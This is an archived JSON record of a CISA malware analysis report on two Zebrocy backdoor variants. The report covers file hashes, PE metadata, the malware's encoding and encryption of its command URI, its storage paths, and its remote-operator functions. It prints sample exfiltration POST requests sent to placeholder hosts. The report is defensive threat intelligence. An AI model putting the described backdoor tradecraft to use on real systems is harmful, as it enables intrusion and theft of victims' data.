{
	"id": "732f4c60-37db-48b2-b470-7755f41b57e6",
	"created_at": "2026-04-06T00:08:09.171298Z",
	"updated_at": "2026-04-10T13:11:18.707909Z",
	"deleted_at": null,
	"sha1_hash": "1468a5f2048824f00d6689e64cb7ad159d5da667",
	"title": "MAR-10310246-1.v1 – ZEBROCY Backdoor | CISA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 62930,
	"plain_text": "MAR-10310246-1.v1 – ZEBROCY Backdoor | CISA\r\nPublished: 2020-10-29 · Archived: 2026-04-05 14:11:13 UTC\r\nNotification\r\nThis report is provided \"as is\" for informational purposes only. The Department of Homeland Security (DHS) does not\r\nprovide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial\r\nproduct or service referenced in this bulletin or otherwise.\r\nThis document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries\r\nminimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to\r\nstandard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the\r\nTraffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.\r\nSummary\r\nDescription\r\nThis Malware Analysis Report (MAR) is the result of analytic efforts between the Cybersecurity and Infrastructure Security\r\nAgency (CISA) and the Cyber National Mission Force (CNMF). The malware variant, known as Zebrocy, has been used by\r\na sophisticated cyber actor. CISA and CNMF are distributing this MAR to enable network defense and reduced exposure to\r\nmalicious activity. This MAR includes suggested response actions and recommended mitigation techniques.\r\nTwo Windows executables identified as a new variant of the Zebrocy backdoor were submitted for analysis. The file is\r\ndesigned to allow a remote operator to perform various functions on the compromised system.\r\nUsers or administrators should flag activity associated with the malware and report the activity to the CISA or the FBI Cyber\r\nWatch (CyWatch), and give the activity the highest priority for enhanced mitigation. For more information on malicious\r\ncyber activity, please visit https[:]//www[.]us-cert.gov.\r\nFor a downloadable copy of IOCs, see MAR-10310246-1.v1.\r\nSubmitted Files (2)\r\n0be114fe30ef5042890c17033b63d7c9e0363972fcc15a61433c598dd33f49d1 (smqft_exe)\r\n2631f95e9a46c821a701269a76b15bb065764cc15a0b268a4d1eac045975c9b8 (sespmw_exe)\r\nFindings\r\n0be114fe30ef5042890c17033b63d7c9e0363972fcc15a61433c598dd33f49d1\r\nTags\r\nbackdoor\r\nDetails\r\nName smqft_exe\r\nSize 4307968 bytes\r\nType PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows\r\nMD5 ba9c59783b52b93aa6dfd4cfffc16f2b\r\nSHA1 ee6753448c3960e8f7ba325a2c00009c31615fd2\r\nSHA256 0be114fe30ef5042890c17033b63d7c9e0363972fcc15a61433c598dd33f49d1\r\nSHA512 bd9e059a9d8fc7deffd12908c01c7c53fbfa9af95296365aa28080d89a668e9eed9c2770ba952cf0174f464dc93e410c92dfdbbaa7bee9f477\r\nssdeep 49152:vATdsrWzBmMmRytymPIcGkJGUAErdu5Pp6oUlMXH85jHuXJfZLJC23:gYYBmMdEsx5gDXgHuTLJ\r\nEntropy 6.196940\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b\r\nPage 1 of 6\n\nAntivirus\r\nBitDefender Gen:Variant.Babar.17722\r\nEmsisoft Gen:Variant.Babar.17722 (B)\r\nLavasoft Gen:Variant.Babar.17722\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 1969-12-31 19:00:00-05:00\r\nImport Hash 20acdf581665d0a5acf497c2fe5e0662\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\nb6114d2ef9c71d56d934ad743f66d209 header 1024 2.184050\r\n0ead1c8fd485e916e3564c37083fb754 .text 1952256 6.048645\r\na5a4f98bad8aefba03b1fd8efa3e8668 .data 196096 5.841971\r\n96bfb1a9a7e45816c45b7d7c1bf3c578 .rdata 2153984 5.690400\r\n916cd27c0226ce956ed74ddf600a3a94 .eh_fram 1024 4.244370\r\nd41d8cd98f00b204e9800998ecf8427e .bss 0 0.000000\r\n1f825370fd049566e1e933455eb0cd06 .idata 2560 4.462264\r\n486c39eb96458f6f5bdb80d71bb0f828 .CRT 512 0.118370\r\naa692f6a7441edad64447679b7d321e8 .tls 512 0.224820\r\nDescription\r\nThis file is a 32-bit Windows executable written using Golang programming language. The file has been identified as a new\r\nvariant of the Zebrocy backdoor. The file takes an argument that is supposed to be an Exclusive OR (XOR) and hexadecimal\r\nencoded Uniform Resource Identifier (URI) or it can run using a plaintext URI.\r\nDisplayed below is a sample plaintext argument used by the malware:\r\n--Begin arguments--\r\nDomain: malware.exe \u003cDomain\u003e\r\nor\r\nIP: malware.exe \u003cIP address:Port\u003e\r\n--End arguments--\r\nWhen executed, it will encrypt the URI using an Advanced Encryption Standard (AES)-128 Electronic Code Book (ECB)\r\nalgorithm with a key generated from the victim's hostname. The encrypted data is hexadecimal encoded and stored into\r\n\"%AppData%\\Roaming\\Personalization\\EUDC\\Policies\\3030304332393839394630353537343934453244.”\r\nIt also collects information about the victim’s system such as username, 6 bytes of current user’s Security Identifiers (SID),\r\nand time of infection. The data is encrypted and hexadecimal encoded before being exfiltrated using the predefined URI:\r\n--Begin POST requests--\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b\r\nPage 2 of 6\n\n--Begin POST request sample--\r\nPOST / HTTP/1.1\r\nHost: www[.]\u003cdomain\u003e.com\r\nUser-Agent: Go-http-client/1.1\r\nContent-Length: 297\r\nContent-Type: multipart/form-data; boundary=ac3d81244405bbbc958b22a748770ad10f9edd7be9946ccfd5b7bb1cc228\r\nAccept-Encoding: gzip\r\n--ac3d81244405bbbc958b22a748770ad10f9edd7be9946ccfd5b7bb1cc228\r\nContent-Disposition: form-data; name=\"filename\";\r\nfilename=\"04760175017f0d0d7f7706067302007f0573010204007134463136334635\"\r\nContent-Type: application/octet-stream\r\n1\r\n--ac3d81244405bbbc958b22a748770ad10f9edd7be9946ccfd5b7bb1cc228--\r\n--End POST request sample--\r\n--Begin POST request sample--\r\nPOST / HTTP/1.1\r\nHost: \u003cIP address\u003e:\u003cPort\u003e\r\nUser-Agent: Go-http-client/1.1\r\nContent-Length: 297\r\nContent-Type: multipart/form-data; boundary=44f47dd373e3a0a0afc00d92bba90bc09c7add1bcf4074de385fd04d1108\r\nAccept-Encoding: gzip\r\n--44f47dd373e3a0a0afc00d92bba90bc09c7add1bcf4074de385fd04d1108\r\nContent-Disposition: form-data; name=\"filename\";\r\nfilename=\"04760175017f0d0d7f7706067302007f0573010204007134463136334635\"\r\nContent-Type: application/octet-stream\r\n1\r\n--44f47dd373e3a0a0afc00d92bba90bc09c7add1bcf4074de385fd04d1108--\r\n--End POST request sample--\r\n--End POST requests--\r\nThe malware is designed to encrypt future communication using an AES encryption algorithm.\r\nThe malware allows a remote operator to perform the following functions:\r\n--Begin functions--\r\nFile manipulation such as creation, modification, and deletion\r\nScreenshot capabilities\r\nDrive enumeration\r\nCommand execution (using cmd.exe)\r\nCreate scheduled task for persistence\r\n--End functions--\r\n2631f95e9a46c821a701269a76b15bb065764cc15a0b268a4d1eac045975c9b8\r\nDetails\r\nName sespmw_exe\r\nSize 4313600 bytes\r\nType PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows\r\nMD5 e8596fd7a15ecc86abbbfdea17a9e73a\r\nSHA1 be07f6a2c9d36a7e9c4d48f21e13e912e6271d83\r\nSHA256 2631f95e9a46c821a701269a76b15bb065764cc15a0b268a4d1eac045975c9b8\r\nSHA512 4a2125a26467ea4eb913abe80a59a85f3341531d634766fccabd14eb8ae1a3e7ee77162df7d5fac362272558db5a6e18f84ce193296fcdfb7\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b\r\nPage 3 of 6\n\nssdeep 49152:J8IkRvcuFh9fQgnf/1th+jrR7PNrNdbMFvm6oUlMXycR+Z5drM0us4:UJHFh91fFg/+MX9RgY0u\r\nEntropy 6.197768\r\nAntivirus\r\nBitDefender Gen:Variant.Babar.17722\r\nEmsisoft Gen:Variant.Babar.17722 (B)\r\nLavasoft Gen:Variant.Babar.17722\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 1970-01-04 14:01:20-05:00\r\nImport Hash 20acdf581665d0a5acf497c2fe5e0662\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n2ebbe6c38d9e8d4da2449cc05f78054a header 1024 2.198390\r\na7c0885448e7013e05bf5ff61b673949 .text 1954816 6.046127\r\n9bf966747acfa91eea3d6a1ef17cc30f .data 196096 5.843286\r\n31182660fce8ae07d0350ebe456b9179 .rdata 2157056 5.696834\r\n9eeb1eeb42e99c54c6429f9122285336 .eh_fram 1024 4.292769\r\nd41d8cd98f00b204e9800998ecf8427e .bss 0 0.000000\r\n0bc884e39b3ba72fb113d63988590b5c .idata 2560 4.424718\r\n9bbfafc74bc296cd99dc8307ffe120ac .CRT 512 0.114463\r\n2b60c482048e4a03fbb82db9c3416db5 .tls 512 0.224820\r\nDescription\r\nThis file is a 32-bit Windows executable written using Golang programming language. The file has been identified as new\r\nvariant of the Zebrocy backdoor. The file takes an argument that is supposed to be an XOR and hexadecimal encoded URI.\r\nThe file cannot run using a plaintext URI as compared to the other Zebrocy backdoor binary\r\n\"ba9c59783b52b93aa6dfd4cfffc16f2b\". This file and ba9c59783b52b93aa6dfd4cfffc16f2b have similar functions.\r\nWhen executed, it will encrypt the URI using AES-128 ECB algorithm with a key generated from the victim's hostname.\r\nThe encrypted data is hexadecimal encoded and stored into\r\n\"%AppData%\\Roaming\\UserData\\Multimedia\\Policies\\3030304332393839394630353537343934453244\".\r\nIt also collects information about the victim’s system such as username, 6 bytes of current user’s SID, and time of infection.\r\nThe data is encrypted and hexadecimal encoded before exfiltrated using the predefined URI.\r\n--Begin POST request--\r\nPOST / HTTP/1.1\r\nHost: www[.]\u003cdomain\u003e.com\r\nUser-Agent: Go-http-client/1.1\r\nContent-Length: 297\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b\r\nPage 4 of 6\n\nContent-Type: multipart/form-data; boundary=0af2fd2b7a4e61d071fa7002fb2b1472abba9bf8a33543e34ecd00d915db\r\nAccept-Encoding: gzip\r\n--0af2fd2b7a4e61d071fa7002fb2b1472abba9bf8a33543e34ecd00d915db\r\nContent-Disposition: form-data; name=\"filename\";\r\nfilename=\"04760175017f0d0d7f7706067302007f0573010204007134463136334635\"\r\nContent-Type: application/octet-stream\r\n1\r\n--0af2fd2b7a4e61d071fa7002fb2b1472abba9bf8a33543e34ecd00d915db--\r\n--End POST request--\r\nThe malware is designed to encrypt future communication using an AES encryption algorithm.\r\nThe malware allows a remote operator to perform the following functions:\r\n--Begin functions--\r\nFile manipulation such as creation, modification, and deletion\r\nScreenshot capabilities\r\nDrive enumeration\r\nCommand execution (using cmd.exe)\r\nCreate schedule a task for persistence manually\r\nMore\r\n--End functions--\r\nRecommendations\r\nCISA recommends that users and administrators consider using the following best practices to strengthen the security\r\nposture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators\r\nprior to implementation to avoid unwanted impacts.\r\nMaintain up-to-date antivirus signatures and engines.\r\nKeep operating system patches up-to-date.\r\nDisable File and Printer sharing services. If these services are required, use strong passwords or Active Directory\r\nauthentication.\r\nRestrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local\r\nadministrators group unless required.\r\nEnforce a strong password policy and implement regular password changes.\r\nExercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be\r\nknown.\r\nEnable a personal firewall on agency workstations, configured to deny unsolicited connection requests.\r\nDisable unnecessary services on agency workstations and servers.\r\nScan for and remove suspicious e-mail attachments; ensure the scanned attachment is its \"true file type\" (i.e., the\r\nextension matches the file header).\r\nMonitor users' web browsing habits; restrict access to sites with unfavorable content.\r\nExercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).\r\nScan all software downloaded from the Internet prior to executing.\r\nMaintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).\r\nAdditional information on malware incident prevention and handling can be found in National Institute of Standards and\r\nTechnology (NIST) Special Publication 800-83, \"Guide to Malware Incident Prevention \u0026 Handling for Desktops and\r\nLaptops\".\r\nContact Information\r\nDocument FAQ\r\nWhat is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in\r\na timely manner. In most instances this report will provide initial indicators for computer and network defense. To request\r\nadditional analysis, please contact CISA and provide information regarding the level of desired analysis.\r\nWhat is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware\r\nanalysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide\r\ninformation regarding the level of desired analysis.\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b\r\nPage 5 of 6\n\nCan I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to\r\nthis document should be directed to the CISA at 1-844-Say-CISA or CISA Central .\r\nCan I submit malware to CISA? Malware samples can be submitted via three methods:\r\nWeb: https://malware.us-cert.gov\r\nE-Mail: submit@malware.us-cert.gov\r\nFTP: ftp.malware.us-cert.gov (anonymous)\r\nCISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software\r\nvulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.\r\nRevisions\r\nOctober 29, 2020: Initial Version\r\nSource: https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia",
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b"
	],
	"report_names": [
		"ar20-303b"
	],
	"threat_actors": [],
	"ts_created_at": 1775434089,
	"ts_updated_at": 1775826678,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1468a5f2048824f00d6689e64cb7ad159d5da667.pdf",
		"text": "https://archive.orkl.eu/1468a5f2048824f00d6689e64cb7ad159d5da667.txt",
		"img": "https://archive.orkl.eu/1468a5f2048824f00d6689e64cb7ad159d5da667.jpg"
	}
}